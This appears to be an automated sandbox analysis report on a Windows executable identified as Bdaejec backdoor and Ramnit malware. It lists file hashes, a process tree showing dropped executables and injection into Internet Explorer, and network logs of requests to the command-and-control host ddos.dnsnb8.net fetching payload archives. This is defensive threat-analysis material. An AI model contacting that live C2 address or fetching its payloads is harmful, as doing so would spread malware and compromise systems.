Overview

overview

10

Static

static

5

f33872774e...bN.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    110s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/12/2024, 02:53 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe

  • Size

    71KB

  • MD5

    8335cc2b5669fe55b594b69ac8c814e0

  • SHA1

    72f11c65623cd87812a2e49ee189b126e3c9fd8a

  • SHA256

    f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fb

  • SHA512

    bcb7a3e08aa98121499ff1dd5e0932d1bf0b7bcd269ca12eb84bf7a4757b8520a51f8e54c471d97373ec646dbcf7ca33f67be9e04b088cf29f8ea93afd2e8074

  • SSDEEP

    1536:T+hzRsibKplyXTq8OGRnsPFG+RODTb7MXL5uXZnzEksGCq2iW7z:iROzoTq0+RO7IwnYJGCH

Score
10/10
bdaejecramnitaspackv2backdoorbankerdiscoveryspywarestealertrojanupxworm

Malware Config

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

    backdoorbdaejec
  • Bdaejec family
    bdaejec
  • Detects Bdaejec Backdoor. 1 IoCs

    Bdaejec is backdoor written in C++.

  • Ramnit

    Ramnit is a versatile family that holds viruses, worms, and Trojans.

    trojanspywarestealerwormbankerramnit
  • Ramnit family
    ramnit
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Executes dropped EXE 2 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe
    "C:\Users\Admin\AppData\Local\Temp\f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fbN.exe"
    1⤵
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Users\Admin\AppData\Local\Temp\SgnMPh.exe
      C:\Users\Admin\AppData\Local\Temp\SgnMPh.exe
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      PID:4976
    • C:\Program Files (x86)\Microsoft\DesktopLayer.exe
      "C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4676
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4032
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4032 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3540

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    154.239.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.239.44.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ddos.dnsnb8.net
    SgnMPh.exe
    Remote address:
    8.8.8.8:53
    Request
    ddos.dnsnb8.net
    IN A
    Response
    ddos.dnsnb8.net
    IN A
    44.221.84.105
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    SgnMPh.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k2.rar
    SgnMPh.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k2.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    134.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    105.84.221.44.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    105.84.221.44.in-addr.arpa
    IN PTR
    Response
    105.84.221.44.in-addr.arpa
    IN PTR
    ec2-44-221-84-105 compute-1 amazonawscom
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k3.rar
    SgnMPh.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k3.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k4.rar
    SgnMPh.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k4.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    SgnMPh.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    api.bing.com
    iexplore.exe
    Remote address:
    8.8.8.8:53
    Request
    api.bing.com
    IN A
    Response
    api.bing.com
    IN CNAME
    api-bing-com.e-0001.e-msedge.net
    api-bing-com.e-0001.e-msedge.net
    IN CNAME
    e-0001.e-msedge.net
    e-0001.e-msedge.net
    IN A
    13.107.5.80
  • flag-us
    DNS
    22.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    161.19.199.152.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    161.19.199.152.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001a-msedgenet
  • flag-us
    DNS
    30.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    30.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    83.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    83.210.23.2.in-addr.arpa
    IN PTR
    Response
    83.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-83deploystaticakamaitechnologiescom
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    SgnMPh.exe
    564 B
     296 B
     6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k2.rar
    http
    SgnMPh.exe
    564 B
     296 B
     6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k2.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k3.rar
    http
    SgnMPh.exe
    564 B
     296 B
     6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k3.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k4.rar
    http
    SgnMPh.exe
    564 B
     296 B
     6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k4.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    SgnMPh.exe
    3.4kB
     312 B
     17
    6

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 44.221.84.105:799
    ddos.dnsnb8.net
    SgnMPh.exe
    260 B
     5
  • 44.221.84.105:799
    ddos.dnsnb8.net
    SgnMPh.exe
    260 B
     5
  • 44.221.84.105:799
    ddos.dnsnb8.net
    SgnMPh.exe
    260 B
     5
  • 204.79.197.200:443
    ieonline.microsoft.com
    tls, http2
    iexplore.exe
    1.2kB
     8.3kB
     16
    14
  • 44.221.84.105:799
    ddos.dnsnb8.net
    SgnMPh.exe
    260 B
     5
  • 44.221.84.105:799
    ddos.dnsnb8.net
    SgnMPh.exe
    208 B
     4
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    154.239.44.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    154.239.44.20.in-addr.arpa

  • 8.8.8.8:53
    ddos.dnsnb8.net
    dns
    SgnMPh.exe
    61 B
     77 B
     1
    1

    DNS Request

    ddos.dnsnb8.net

    DNS Response

    44.221.84.105

  • 8.8.8.8:53
    134.130.81.91.in-addr.arpa
    dns
    72 B
     147 B
     1
    1

    DNS Request

    134.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    105.84.221.44.in-addr.arpa
    dns
    72 B
     127 B
     1
    1

    DNS Request

    105.84.221.44.in-addr.arpa

  • 8.8.8.8:53
    api.bing.com
    dns
    iexplore.exe
    58 B
     134 B
     1
    1

    DNS Request

    api.bing.com

    DNS Response

    13.107.5.80

  • 8.8.8.8:53
    22.160.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    22.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    161.19.199.152.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    161.19.199.152.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
     147 B
     1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    73 B
     106 B
     1
    1

    DNS Request

    200.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    30.243.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    30.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    83.210.23.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    83.210.23.2.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\Microsoft\DesktopLayer.exe
    Filesize

    71KB

    MD5

    8335cc2b5669fe55b594b69ac8c814e0

    SHA1

    72f11c65623cd87812a2e49ee189b126e3c9fd8a

    SHA256

    f33872774e26dd5224a50c7a855ac4cb6c002d2e9c75dde9235814279dae89fb

    SHA512

    bcb7a3e08aa98121499ff1dd5e0932d1bf0b7bcd269ca12eb84bf7a4757b8520a51f8e54c471d97373ec646dbcf7ca33f67be9e04b088cf29f8ea93afd2e8074

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    471B

    MD5

    87f8376b71b1fd35da4b511eff055888

    SHA1

    0c55fba0aa699282bbe4d129dd0ba16d4e377ce9

    SHA256

    a1383ed3b4f8967fb19f5b16bfe41eb3242b296ffc06c1098fbe1d1a04a7003f

    SHA512

    8556ed20a3d9daf8f74b2eceaab6a3773b69d5c9524ba8dbb8af1ad64b2235165e487c41646e357be5906aaa7f0f4c57ff8dc9ea2acc0c87f443d3ad083c9031

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    404B

    MD5

    f680c360423cf2585d75b7110f0507d1

    SHA1

    287d9c40a08ed5a0d2f517520af74c94c4e2c9a8

    SHA256

    f0409aeb183f9f00176b749b1487dc9c5615905f9d67f01455d629f842b8a837

    SHA512

    b20df284f534825c038275c5c810fcfd298dbe3aada8377f8bb1832cfe7ad09936550813015200fe7613e667128c6798e953a99a576eb498f6d5787f115835f1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P2UT3MS5\k2[1].rar
    Filesize

    4B

    MD5

    d3b07384d113edec49eaa6238ad5ff00

    SHA1

    f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

    SHA256

    b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

    SHA512

    0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P2UT3MS5\suggestions[1].en-US
    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\4AE41F4B.exe
    Filesize

    4B

    MD5

    20879c987e2f9a916e578386d499f629

    SHA1

    c7b33ddcc42361fdb847036fc07e880b81935d5d

    SHA256

    9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

    SHA512

    bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\SgnMPh.exe
    Filesize

    15KB

    MD5

    56b2c3810dba2e939a8bb9fa36d3cf96

    SHA1

    99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

    SHA256

    4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

    SHA512

    27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

    Download Submit

  • memory/2320-7-0x0000000000520000-0x000000000052F000-memory.dmp

    Filesize

    60KB

    Download

  • memory/2320-9-0x0000000000400000-0x0000000000433000-memory.dmp

    Filesize

    204KB

    Download

  • memory/2320-0-0x0000000000400000-0x0000000000433000-memory.dmp

    Filesize

    204KB

    Download

  • memory/4676-13-0x0000000000400000-0x0000000000433000-memory.dmp

    Filesize

    204KB

    Download

  • memory/4676-15-0x00000000004E0000-0x00000000004E1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4976-45-0x0000000000D10000-0x0000000000D19000-memory.dmp

    Filesize

    36KB

    Download

  • memory/4976-4-0x0000000000D10000-0x0000000000D19000-memory.dmp

    Filesize

    36KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.